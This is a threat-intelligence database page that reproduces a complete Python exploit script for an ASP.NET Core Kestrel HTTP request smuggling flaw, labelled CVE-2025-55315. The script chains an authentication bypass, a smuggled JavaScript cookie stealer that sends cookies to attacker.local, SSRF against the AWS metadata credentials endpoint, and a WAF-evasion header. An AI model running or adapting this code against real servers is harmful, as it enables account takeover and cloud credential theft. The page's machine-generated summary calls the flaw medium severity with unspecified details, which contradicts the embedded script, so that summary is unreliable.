ASP.net 8.0.10 - Bypass
ASP.net 8.0.10 - Bypass
AI Analysis
Technical Summary
This threat involves an exploit against ASP.net 8.0.10 that enables bypassing unspecified security mechanisms. The exploit code is publicly available in Python, indicating proof-of-concept or potential for exploitation. There is no information on specific vulnerabilities exploited, affected sub-versions, or the nature of the bypass. No patch or remediation details are provided, and no known exploits in the wild have been reported.
Potential Impact
The impact is described as medium severity, suggesting that successful exploitation could lead to moderate security consequences, such as unauthorized access or privilege escalation. However, the lack of detailed technical or impact information limits precise impact assessment.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until official guidance or patches are available, cautious monitoring and limiting exposure of ASP.net 8.0.10 instances are advisable.
Indicators of Compromise
- exploit-code: # Exploit Title: ASP.net 8.0.10 - Bypass # Date: 2025-11-03 # Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # GitHub: https://github.com/mbanyamer # CVE: CVE-2025-55315 # Tested on: .NET Kestrel (unpatched) - ASP.NET Core on localhost (lab environment) # Platform: remote # Type: webapps # Attack Vector: Network (HTTP/HTTPS) - Remote exploitation via malformed chunked encoding # CVSS: 9.8 (Critical) - Estimated: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H # # Description: # This exploit demonstrates a critical HTTP Request Smuggling vulnerability in # unpatched versions of .NET Kestrel due to improper handling of malformed # chunk extensions (LF-only line endings). The script performs: # 1. Automatic fingerprinting to detect vulnerable instances # 2. Auth bypass to access restricted endpoints (/admin) # 3. Session hijacking via response queue poisoning (JS cookie stealer) # 4. SSRF to internal metadata services (e.g., AWS 169.254.169.254) # Includes WAF bypass using 'chUnKEd' header and generates detailed JSON reports. # # The vulnerability allows full remote compromise: authentication bypass, # session theft, and internal network access — all from a single HTTP request. # # Patched in .NET 9.0.1 / 8.0.10+ (October 2025). # # IMPORTANT SAFETY : # - DO NOT RUN AGAINST PRODUCTION OR THIRD-PARTY SYSTEMS. # - Use only in isolated environments (VM, Docker with --network none). # - All payloads are educational and non-destructive by design. # - Modify payloads only within your controlled lab. # # References: # - CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-55315 # - Microsoft Security Advisory (hypothetical): https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55315 from __future__ import annotations import socket import ssl import time import argparse import json import os from typing import Tuple, Optional DEFAULT_TIMEOUT = 3.0 READ_CHUNK = 4096 REPORT_DIR = "kestrel_desync_reports" os.makedirs(REPORT_DIR, exist_ok=True) # ------------------ Utilities ------------------ def now_iso() -> str: return time.strftime('%Y-%m-%dT%H:%M:%SZ', time.gmtime()) def hexdump(b: bytes, maxlen: int = 200) -> str: shown = b[:maxlen] hexed = ' '.join(f"{x:02x}" for x in shown) return f"{hexed} ..." if len(b) > maxlen else hexed def save_file(path: str, data: bytes) -> None: try: with open(path, 'wb') as f: f.write(data) print(f"[+] Saved: {path}") except Exception as e: print(f"[!] Save failed: {e}") # ------------------ Networking ------------------ def send_http(host: str, port: int, data: bytes, use_tls: bool = False) -> Tuple[Optional[bytes], bool]: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(DEFAULT_TIMEOUT) try: if use_tls: ctx = ssl.create_default_context() s = ctx.wrap_socket(s, server_hostname=host) s.connect((host, port)) s.sendall(data) parts = [] while True: try: chunk = s.recv(READ_CHUNK) if not chunk: break parts.append(chunk) except socket.timeout: break resp = b''.join(parts) s.settimeout(0.2) try: s.recv(1) open_flag = True except: open_flag = False s.close() return resp, open_flag except Exception: return None, False # ------------------ Request Builder (WAF Bypass) ------------------ def build_chunked(method: str, path: str, body: bytes, extra_headers: list = None) -> bytes: headers = [ f"{method} {path} HTTP/1.1", "Host: localhost", "Transfer-Encoding: chUnKEd", # WAF Bypass "Content-Type: text/plain", ] if extra_headers: headers.extend(extra_headers) headers.extend(["", ""]) return "\r\n".join(headers).encode() + body # ------------------ Fingerprint ------------------ def fingerprint(host: str, port: int, use_tls: bool) -> Tuple[bool, Optional[bytes]]: print(f"[*] Fingerprinting {host}:{port}...") payload = b"1\nx\n0\n\n" req = build_chunked("POST", "/", payload) resp, _ = send_http(host, port, req, use_tls) if resp and b"400" not in resp.split(b'\r\n', 1)[0]: print(f"[!] VULNERABLE: Accepted LF-only chunk!") return True, resp print(f"[+] Patched: 400 Bad Request") return False, resp # ------------------ Exploit Chain ------------------ def exploit_chain(host: str, port: int, use_tls: bool): results = [] # 1. Auth Bypass print(f"[!] 1. Auth Bypass → /admin") smug_admin = b"0\r\n\r\nGET /admin HTTP/1.1\r\nHost: localhost\r\nX-Bypass: yes\r\n\r\n" req1 = build_chunked("POST", "/", b"1;ext\nx\n" + smug_admin, ["Content-Length: 50"]) resp1, _ = send_http(host, port, req1, use_tls) if resp1 and (b"admin" in resp1.lower() or b"dashboard" in resp1.lower()): results.append("Auth Bypass: SUCCESS") save_file(os.path.join(REPORT_DIR, f"admin_page_{host}_{port}.html"), resp1) else: results.append("Auth Bypass: FAILED") # 2. Session Hijacking print(f"[!] 2. Session Hijacking → JS Stealer") js_payload = ( b"0\r\n\r\nGET / HTTP/1.1\r\nHost: localhost\r\n" b"Content-Type: text/html\r\nContent-Length: 120\r\n\r\n" b"<script>fetch('http://attacker.local/steal?c='+document.cookie)</script>" ) req2 = build_chunked("POST", "/", b"1;ext\nx\n" + js_payload) send_http(host, port, req2, use_tls) results.append("Session Hijack: INJECTED") # 3. SSRF print(f"[!] 3. SSRF → AWS Metadata") ssrf = b"0\r\n\r\nGET http://169.254.169.254/latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: localhost\r\n\r\n" req3 = build_chunked("POST", "/", b"1;ext\nx\n" + ssrf) resp3, _ = send_http(host, port, req3, use_tls) if resp3 and b"role" in resp3: results.append("SSRF: SUCCESS") save_file(os.path.join(REPORT_DIR, f"ssrf_metadata_{host}_{port}.txt"), resp3) else: results.append("SSRF: FAILED") return results # ------------------ Reporting ------------------ def save_json_report(host: str, port: int, use_tls: bool, results: list): report = { "target": f"{host}:{port}", "tls": use_tls, "timestamp": now_iso(), "cve": "CVE-2025-55315", "status": "VULNERABLE", "waf_bypass": "chUnKEd", "exploits": results } path = os.path.join(REPORT_DIR, f"REPORT_{host}_{port}_{int(time.time())}.json") with open(path, 'w', encoding='utf-8') as f: json.dump(report, f, indent=2) print(f"[+] JSON Report: {path}") # ------------------ CLI ------------------ def main(): parser = argparse.ArgumentParser() parser.add_argument("target", help="host:port or host:port:tls") args = parser.parse_args() parts = args.target.split(":") host = parts[0] port = int(parts[1]) use_tls = len(parts) > 2 and parts[2].lower() in ("tls", "1") print(f"\n=== Kestrel Desync Full Chain ===\nTarget: {host}:{port} (TLS: {use_tls})\n") is_vuln, _ = fingerprint(host, port, use_tls) if not is_vuln: print("[+] Target is patched. Exiting.") return results = exploit_chain(host, port, use_tls) save_json_report(host, port, use_tls, results) print(f"\n[+] Exploitation chain completed!") print(f"[+] All files in: {REPORT_DIR}") if __name__ == "__main__": main()
ASP.net 8.0.10 - Bypass
Description
ASP.net 8.0.10 - Bypass
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
This threat involves an exploit against ASP.net 8.0.10 that enables bypassing unspecified security mechanisms. The exploit code is publicly available in Python, indicating proof-of-concept or potential for exploitation. There is no information on specific vulnerabilities exploited, affected sub-versions, or the nature of the bypass. No patch or remediation details are provided, and no known exploits in the wild have been reported.
Potential Impact
The impact is described as medium severity, suggesting that successful exploitation could lead to moderate security consequences, such as unauthorized access or privilege escalation. However, the lack of detailed technical or impact information limits precise impact assessment.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until official guidance or patches are available, cautious monitoring and limiting exposure of ASP.net 8.0.10 instances are advisable.
Technical Details
- Edb Id
- 52492
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for ASP.net 8.0.10 - Bypass
# Exploit Title: ASP.net 8.0.10 - Bypass # Date: 2025-11-03 # Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # GitHub: https://github.com/mbanyamer # CVE: CVE-2025-55315 # Tested on: .NET Kestrel (unpatched) - ASP.NET Core on localhost (lab environment) # Platform: remote # Type: webapps # Attack Vector: Network (HTTP/HTTPS) - Remote exploitation via malformed chunked encoding # CVSS: 9.8 (Critical) - Estimated: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H # #... (7077 more characters)
Threat ID: 69d4e432aaed68159a0d458a
Added to database: 4/7/2026, 11:02:10 AM
Last enriched: 4/7/2026, 11:02:36 AM
Last updated: 4/7/2026, 6:56:24 PM
Views: 6
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.